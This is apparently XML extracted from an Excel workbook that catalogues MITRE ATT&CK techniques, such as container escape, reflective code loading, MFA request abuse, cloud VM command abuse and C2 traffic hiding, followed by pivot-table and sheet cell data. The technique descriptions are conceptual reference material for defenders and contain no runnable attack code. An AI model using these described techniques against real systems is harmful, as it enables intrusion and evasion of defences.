    <s v="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In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)_x000a__x000a_Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)"/>
  </r>
  <r>
    <x v="181"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host."/>
  </r>
  <r>
    <x v="182"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="183"/>
    <x v="4"/>
    <s v="Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster._x000a__x000a_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
  </r>
  <r>
    <x v="184"/>
    <x v="4"/>
    <s v="_x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)"/>
  </r>
  <r>
    <x v="184"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable."/>
  </r>
  <r>
    <x v="185"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit."/>
  </r>
  <r>
    <x v="186"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) ."/>
  </r>
  <r>
    <x v="187"/>
    <x v="3"/>
    <s v="Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129))._x000a__x000a_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For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)_x000a__x000a_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
  </r>
  <r>
    <x v="188"/>
    <x v="1"/>
    <s v="Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users._x000a__x000a_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f adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)_x000a__x000a_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
  </r>
  <r>
    <x v="189"/>
    <x v="23"/>
    <s v="Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="190"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="191"/>
    <x v="9"/>
    <s v="Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. _x000a__x000a_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_x000a__x000a_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This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation: OWN-CERT Google App Script 2024)"/>
  </r>
  <r>
    <x v="192"/>
    <x v="1"/>
    <s v="Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="193"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_**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
  </r>
  <r>
    <x v="194"/>
    <x v="9"/>
    <s v="Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)_x000a__x000a_If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)"/>
  </r>
  <r>
    <x v="195"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)"/>
  </r>
  <r>
    <x v="196"/>
    <x v="18"/>
    <s v="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_x000a__x000a_Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)_x000a__x000a_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_x000a__x000a_Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)"/>
  </r>
  <r>
    <x v="197"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis._x000a__x000a_In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)"/>
  </r>
  <r>
    <x v="198"/>
    <x v="3"/>
    <s v="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_x000a_ _x000a_In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657)._x000a__x000a_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_x000a_ _x000a_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_x000a_ _x000a_There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)"/>
  </r>
  <r>
    <x v="199"/>
    <x v="22"/>
    <s v="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quot;pig butchering,&quot;(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) _x000a__x000a_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_x000a__x000a_Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)_x000a__x000a_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
  </r>
  <r>
    <x v="200"/>
    <x v="30"/>
    <s v="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_x000a__x000a_Adversaries may inject content to victim systems in various ways, including:_x000a__x000a_*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_x000a_* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)_x000a__x000a_Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with &quot;lawful interception.&quot;(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)"/>
  </r>
  <r>
    <x v="201"/>
    <x v="0"/>
    <s v="Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely._x000a__x000a_C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)_x000a__x000a_Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)_x000a__x000a_Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)"/>
  </r>
  <r>
    <x v="202"/>
    <x v="3"/>
    <s v="Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  _x000a__x000a_IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)_x000a__x000a_Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)_x000a__x000a_In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 20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7579DD-1149-43E4-A68F-AE4C8B6415E3}" name="PivotTable1"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B237" firstHeaderRow="1" firstDataRow="1" firstDataCol="2"/>
  <pivotFields count="3">
    <pivotField axis="axisRow" compact="0" outline="0" showAll="0">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axis="axisRow" compact="0" outline="0" showAll="0">
      <items count="32">
        <item x="2"/>
        <item x="12"/>
        <item x="0"/>
        <item x="21"/>
        <item x="30"/>
        <item x="1"/>
        <item x="25"/>
        <item x="8"/>
        <item x="3"/>
        <item x="23"/>
        <item x="29"/>
        <item x="15"/>
        <item x="24"/>
        <item x="20"/>
        <item x="26"/>
        <item x="11"/>
        <item x="4"/>
        <item x="9"/>
        <item x="14"/>
        <item x="10"/>
        <item x="5"/>
        <item x="22"/>
        <item x="19"/>
        <item x="16"/>
        <item x="17"/>
        <item x="6"/>
        <item x="18"/>
        <item x="7"/>
        <item x="13"/>
        <item x="28"/>
        <item x="27"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField compact="0" outline="0" showAll="0"/>
  </pivotFields>
  <rowFields count="2">
    <field x="1"/>
    <field x="0"/>
  </rowFields>
  <rowItems count="234">
    <i>
      <x/>
      <x v="2"/>
    </i>
    <i r="1">
      <x v="14"/>
    </i>
    <i r="1">
      <x v="21"/>
    </i>
    <i r="1">
      <x v="39"/>
    </i>
    <i r="1">
      <x v="57"/>
    </i>
    <i r="1">
      <x v="58"/>
    </i>
    <i r="1">
      <x v="59"/>
    </i>
    <i r="1">
      <x v="60"/>
    </i>
    <i r="1">
      <x v="62"/>
    </i>
    <i r="1">
      <x v="64"/>
    </i>
    <i r="1">
      <x v="75"/>
    </i>
    <i r="1">
      <x v="92"/>
    </i>
    <i r="1">
      <x v="119"/>
    </i>
    <i r="1">
      <x v="140"/>
    </i>
    <i r="1">
      <x v="176"/>
    </i>
    <i t="default">
      <x/>
    </i>
    <i>
      <x v="1"/>
      <x v="31"/>
    </i>
    <i r="1">
      <x v="137"/>
    </i>
    <i t="default">
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
      <x/>
    </i>
    <i r="1">
      <x v="5"/>
    </i>
    <i r="1">
      <x v="37"/>
    </i>
    <i r="1">
      <x v="45"/>
    </i>
    <i r="1">
      <x v="47"/>
    </i>
    <i r="1">
      <x v="48"/>
    </i>
    <i r="1">
      <x v="50"/>
    </i>
    <i r="1">
      <x v="51"/>
    </i>
    <i r="1">
      <x v="52"/>
    </i>
    <i r="1">
      <x v="67"/>
    </i>
    <i r="1">
      <x v="96"/>
    </i>
    <i r="1">
      <x v="148"/>
    </i>
    <i r="1">
      <x v="151"/>
    </i>
    <i r="1">
      <x v="152"/>
    </i>
    <i r="1">
      <x v="153"/>
    </i>
    <i r="1">
      <x v="201"/>
    </i>
    <i t="default">
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
      <x v="87"/>
    </i>
    <i t="default">
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
      <x v="200"/>
    </i>
    <i t="default">
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
      <x v="1"/>
    </i>
    <i r="1">
      <x v="54"/>
    </i>
    <i r="1">
      <x v="55"/>
    </i>
    <i r="1">
      <x v="76"/>
    </i>
    <i r="1">
      <x v="91"/>
    </i>
    <i r="1">
      <x v="117"/>
    </i>
    <i r="1">
      <x v="125"/>
    </i>
    <i r="1">
      <x v="132"/>
    </i>
    <i r="1">
      <x v="135"/>
    </i>
    <i r="1">
      <x v="138"/>
    </i>
    <i r="1">
      <x v="177"/>
    </i>
    <i r="1">
      <x v="188"/>
    </i>
    <i r="1">
      <x v="192"/>
    </i>
    <i t="default">
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
      <x v="136"/>
    </i>
    <i t="default">
      <x v="6"/>
    </i>
    <i>
      <x v="7"/>
      <x v="22"/>
    </i>
    <i t="default">
      <x v="7"/>
    </i>
    <i>
      <x v="8"/>
      <x v="3"/>
    </i>
    <i r="1">
      <x v="9"/>
    </i>
    <i r="1">
      <x v="15"/>
    </i>
    <i r="1">
      <x v="19"/>
    </i>
    <i r="1">
      <x v="36"/>
    </i>
    <i r="1">
      <x v="56"/>
    </i>
    <i r="1">
      <x v="65"/>
    </i>
    <i r="1">
      <x v="73"/>
    </i>
    <i r="1">
      <x v="84"/>
    </i>
    <i r="1">
      <x v="88"/>
    </i>
    <i r="1">
      <x v="90"/>
    </i>
    <i r="1">
      <x v="93"/>
    </i>
    <i r="1">
      <x v="95"/>
    </i>
    <i r="1">
      <x v="97"/>
    </i>
    <i r="1">
      <x v="98"/>
    </i>
    <i r="1">
      <x v="99"/>
    </i>
    <i r="1">
      <x v="100"/>
    </i>
    <i r="1">
      <x v="122"/>
    </i>
    <i r="1">
      <x v="133"/>
    </i>
    <i r="1">
      <x v="142"/>
    </i>
    <i r="1">
      <x v="144"/>
    </i>
    <i r="1">
      <x v="155"/>
    </i>
    <i r="1">
      <x v="173"/>
    </i>
    <i r="1">
      <x v="174"/>
    </i>
    <i r="1">
      <x v="175"/>
    </i>
    <i r="1">
      <x v="182"/>
    </i>
    <i r="1">
      <x v="187"/>
    </i>
    <i r="1">
      <x v="190"/>
    </i>
    <i r="1">
      <x v="198"/>
    </i>
    <i r="1">
      <x v="202"/>
    </i>
    <i t="default">
      <x v="8"/>
    </i>
    <i>
      <x v="9"/>
      <x v="110"/>
    </i>
    <i r="1">
      <x v="189"/>
    </i>
    <i t="default">
      <x v="9"/>
    </i>
    <i>
      <x v="10"/>
      <x v="180"/>
    </i>
    <i t="default">
      <x v="10"/>
    </i>
    <i>
      <x v="11"/>
      <x v="40"/>
    </i>
    <i t="default">
      <x v="11"/>
    </i>
    <i>
      <x v="12"/>
      <x v="131"/>
    </i>
    <i t="default">
      <x v="12"/>
    </i>
    <i>
      <x v="13"/>
      <x v="80"/>
    </i>
    <i r="1">
      <x v="126"/>
    </i>
    <i t="default">
      <x v="13"/>
    </i>
    <i>
      <x v="14"/>
      <x v="154"/>
    </i>
    <i t="default">
      <x v="14"/>
    </i>
    <i>
      <x v="15"/>
      <x v="30"/>
    </i>
    <i r="1">
      <x v="69"/>
    </i>
    <i r="1">
      <x v="102"/>
    </i>
    <i r="1">
      <x v="130"/>
    </i>
    <i t="default">
      <x v="15"/>
    </i>
    <i>
      <x v="16"/>
      <x v="4"/>
    </i>
    <i r="1">
      <x v="6"/>
    </i>
    <i r="1">
      <x v="8"/>
    </i>
    <i r="1">
      <x v="10"/>
    </i>
    <i r="1">
      <x v="11"/>
    </i>
    <i r="1">
      <x v="18"/>
    </i>
    <i r="1">
      <x v="24"/>
    </i>
    <i r="1">
      <x v="27"/>
    </i>
    <i r="1">
      <x v="32"/>
    </i>
    <i r="1">
      <x v="35"/>
    </i>
    <i r="1">
      <x v="42"/>
    </i>
    <i r="1">
      <x v="43"/>
    </i>
    <i r="1">
      <x v="44"/>
    </i>
    <i r="1">
      <x v="61"/>
    </i>
    <i r="1">
      <x v="63"/>
    </i>
    <i r="1">
      <x v="70"/>
    </i>
    <i r="1">
      <x v="83"/>
    </i>
    <i r="1">
      <x v="94"/>
    </i>
    <i r="1">
      <x v="101"/>
    </i>
    <i r="1">
      <x v="114"/>
    </i>
    <i r="1">
      <x v="116"/>
    </i>
    <i r="1">
      <x v="124"/>
    </i>
    <i r="1">
      <x v="156"/>
    </i>
    <i r="1">
      <x v="183"/>
    </i>
    <i r="1">
      <x v="184"/>
    </i>
    <i r="1">
      <x v="185"/>
    </i>
    <i r="1">
      <x v="186"/>
    </i>
    <i r="1">
      <x v="195"/>
    </i>
    <i r="1">
      <x v="197"/>
    </i>
    <i t="default">
      <x v="16"/>
    </i>
    <i>
      <x v="17"/>
      <x v="25"/>
    </i>
    <i r="1">
      <x v="33"/>
    </i>
    <i r="1">
      <x v="53"/>
    </i>
    <i r="1">
      <x v="66"/>
    </i>
    <i r="1">
      <x v="85"/>
    </i>
    <i r="1">
      <x v="86"/>
    </i>
    <i r="1">
      <x v="139"/>
    </i>
    <i r="1">
      <x v="149"/>
    </i>
    <i r="1">
      <x v="179"/>
    </i>
    <i r="1">
      <x v="191"/>
    </i>
    <i r="1">
      <x v="194"/>
    </i>
    <i t="default">
      <x v="17"/>
    </i>
    <i>
      <x v="18"/>
      <x v="38"/>
    </i>
    <i t="default">
      <x v="18"/>
    </i>
    <i>
      <x v="19"/>
      <x v="29"/>
    </i>
    <i t="default">
      <x v="19"/>
    </i>
    <i>
      <x v="20"/>
      <x v="7"/>
    </i>
    <i r="1">
      <x v="12"/>
    </i>
    <i r="1">
      <x v="16"/>
    </i>
    <i r="1">
      <x v="17"/>
    </i>
    <i r="1">
      <x v="23"/>
    </i>
    <i r="1">
      <x v="26"/>
    </i>
    <i r="1">
      <x v="28"/>
    </i>
    <i r="1">
      <x v="123"/>
    </i>
    <i r="1">
      <x v="147"/>
    </i>
    <i t="default">
      <x v="20"/>
    </i>
    <i>
      <x v="21"/>
      <x v="103"/>
    </i>
    <i r="1">
      <x v="104"/>
    </i>
    <i r="1">
      <x v="105"/>
    </i>
    <i r="1">
      <x v="106"/>
    </i>
    <i r="1">
      <x v="107"/>
    </i>
    <i r="1">
      <x v="108"/>
    </i>
    <i r="1">
      <x v="109"/>
    </i>
    <i r="1">
      <x v="111"/>
    </i>
    <i r="1">
      <x v="112"/>
    </i>
    <i r="1">
      <x v="118"/>
    </i>
    <i r="1">
      <x v="120"/>
    </i>
    <i r="1">
      <x v="141"/>
    </i>
    <i r="1">
      <x v="145"/>
    </i>
    <i r="1">
      <x v="199"/>
    </i>
    <i t="default">
      <x v="21"/>
    </i>
    <i>
      <x v="22"/>
      <x v="77"/>
    </i>
    <i r="1">
      <x v="78"/>
    </i>
    <i r="1">
      <x v="79"/>
    </i>
    <i r="1">
      <x v="81"/>
    </i>
    <i r="1">
      <x v="82"/>
    </i>
    <i r="1">
      <x v="146"/>
    </i>
    <i t="default">
      <x v="22"/>
    </i>
    <i>
      <x v="23"/>
      <x v="46"/>
    </i>
    <i t="default">
      <x v="23"/>
    </i>
    <i>
      <x v="24"/>
      <x v="68"/>
    </i>
    <i t="default">
      <x v="24"/>
    </i>
    <i>
      <x v="25"/>
      <x v="13"/>
    </i>
    <i r="1">
      <x v="41"/>
    </i>
    <i r="1">
      <x v="89"/>
    </i>
    <i r="1">
      <x v="121"/>
    </i>
    <i r="1">
      <x v="143"/>
    </i>
    <i r="1">
      <x v="150"/>
    </i>
    <i t="default">
      <x v="25"/>
    </i>
    <i>
      <x v="26"/>
      <x v="71"/>
    </i>
    <i r="1">
      <x v="72"/>
    </i>
    <i r="1">
      <x v="74"/>
    </i>
    <i r="1">
      <x v="113"/>
    </i>
    <i r="1">
      <x v="115"/>
    </i>
    <i r="1">
      <x v="134"/>
    </i>
    <i r="1">
      <x v="196"/>
    </i>
    <i t="default">
      <x v="26"/>
    </i>
    <i>
      <x v="27"/>
      <x v="20"/>
    </i>
    <i r="1">
      <x v="49"/>
    </i>
    <i r="1">
      <x v="127"/>
    </i>
    <i r="1">
      <x v="128"/>
    </i>
    <i r="1">
      <x v="129"/>
    </i>
    <i t="default">
      <x v="27"/>
    </i>
    <i>
      <x v="28"/>
      <x v="34"/>
    </i>
    <i r="1">
      <x v="181"/>
    </i>
    <i t="default">
      <x v="28"/>
    </i>
    <i>
      <x v="29"/>
      <x v="163"/>
    </i>
    <i r="1">
      <x v="164"/>
    </i>
    <i r="1">
      <x v="165"/>
    </i>
    <i r="1">
      <x v="166"/>
    </i>
    <i r="1">
      <x v="167"/>
    </i>
    <i r="1">
      <x v="168"/>
    </i>
    <i r="1">
      <x v="169"/>
    </i>
    <i r="1">
      <x v="170"/>
    </i>
    <i r="1">
      <x v="171"/>
    </i>
    <i r="1">
      <x v="172"/>
    </i>
    <i t="default">
      <x v="29"/>
    </i>
    <i>
      <x v="30"/>
      <x v="157"/>
    </i>
    <i r="1">
      <x v="158"/>
    </i>
    <i r="1">
      <x v="159"/>
    </i>
    <i r="1">
      <x v="160"/>
    </i>
    <i r="1">
      <x v="161"/>
    </i>
    <i r="1">
      <x v="162"/>
    </i>
    <i r="1">
      <x v="178"/>
    </i>
    <i r="1">
      <x v="193"/>
    </i>
    <i t="default">
      <x v="3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066140-984F-4B3E-AA68-2ED499BF2368}" name="Techniques" displayName="Techniques" ref="A1:C657" totalsRowShown="0" headerRowDxfId="16" dataDxfId="14" headerRowBorderDxfId="15" tableBorderDxfId="13">
  <autoFilter ref="A1:C657" xr:uid="{10066140-984F-4B3E-AA68-2ED499BF2368}"/>
  <tableColumns count="3">
    <tableColumn id="1" xr3:uid="{3A5ED5C2-6C11-42AC-A964-65059E70A868}" name="Tech#" dataDxfId="12"/>
    <tableColumn id="3" xr3:uid="{3FD4014F-70DB-4425-AB99-8374AF89BC6D}" name="Tactics" dataDxfId="11"/>
    <tableColumn id="8" xr3:uid="{F86C1390-B39C-40E9-988B-80C831C176C6}" name="description" dataDxfId="1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39649C-6FDC-462B-B66F-C3CAFC155A9E}" name="Sources" displayName="Sources" ref="A1:H146" totalsRowShown="0" headerRowDxfId="9" headerRowBorderDxfId="8" tableBorderDxfId="7">
  <autoFilter ref="A1:H146" xr:uid="{1C39649C-6FDC-462B-B66F-C3CAFC155A9E}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{42A1F5B4-0F8E-48A2-B645-E3346F997457}" name="Data Source"/>
    <tableColumn id="2" xr3:uid="{09B530F2-5B66-4DE2-A310-66A409EDBC75}" name="ID"/>
    <tableColumn id="3" xr3:uid="{F865FC8D-DFC5-4ABE-9A38-7F7AE11B1ECB}" name="Available" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{2AD1446D-4B88-4A06-B5C1-DE9928F270C4}" name="Note" dataDxfId="5"/>
    <tableColumn id="6" xr3:uid="{DEC6DB1F-CFA7-41FA-B493-F9E40CFCD98C}" name="collection layers"/>
    <tableColumn id="7" xr3:uid="{C55ECA40-DFFB-4DC8-A4D2-1B0CB3DED768}" name="platforms"/>
    <tableColumn id="11" xr3:uid="{1B3A4C1E-945B-455B-9E92-11E44A3417D0}" name="type"/>
    <tableColumn id="5" xr3:uid="{153C96F1-F314-4037-B58D-FC5C6FAE2A9B}" name="description"/>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349BB-5E92-4392-95C5-DFC33041AEB2}">
  <dimension ref="A3:B237"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A3" workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="61" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="8.42578125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="36" t="s">
        <v>18</v>
      </c>
      <c r="B3" s="36" t="s">
        <v>1339</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>10</v>
      </c>
      <c r="B4" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B5" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B6" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B7" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B8" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B9" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B10" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B11" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B12" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B13" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B14" t="s">
        <v>358</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B15" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B16" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B17" t="s">
        <v>654</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B18" t="s">
        <v>872</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>181</v>
      </c>
      <c r="B20" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B21" t="s">
        <v>632</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>1341</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>11</v>
      </c>
      <c r="B23" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B24" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B25" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B26" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B27" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B28" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B29" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="B30" t="s">
        <v>284</v>
      </c>
    </row>
